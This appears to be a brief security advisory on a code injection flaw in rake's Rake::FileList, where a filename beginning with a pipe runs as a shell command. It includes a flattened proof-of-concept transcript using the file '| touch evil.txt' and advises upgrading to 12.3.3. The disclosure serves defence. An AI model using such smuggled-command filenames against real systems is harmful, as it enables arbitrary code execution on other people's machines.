rake is a Make-like program implemented in Ruby.
Affected versions of this package are vulnerable to Arbitrary Code Injection in
Rake::FileList when supplying a filename that begins with the pipe character
PoC by Katsuhiko Yoshida
% ls -1 Gemfile Gemfile.lock poc_rake.rb vendor | touch evil.txt % bundle exec ruby poc_rake.rb ["poc_rake.rb", "Gemfile", "Gemfile.lock", "| touch evil.txt", "vendor"] poc_rake.rb:6:list.egrep(/something/) Error while processing 'vendor': Is a directory @ io_fillbuf - fd:7 vendor % ls -1 Gemfile Gemfile.lock evil.txt poc_rake.rb vendor | touch evil.txt
rake to version 12.3.3 or higher.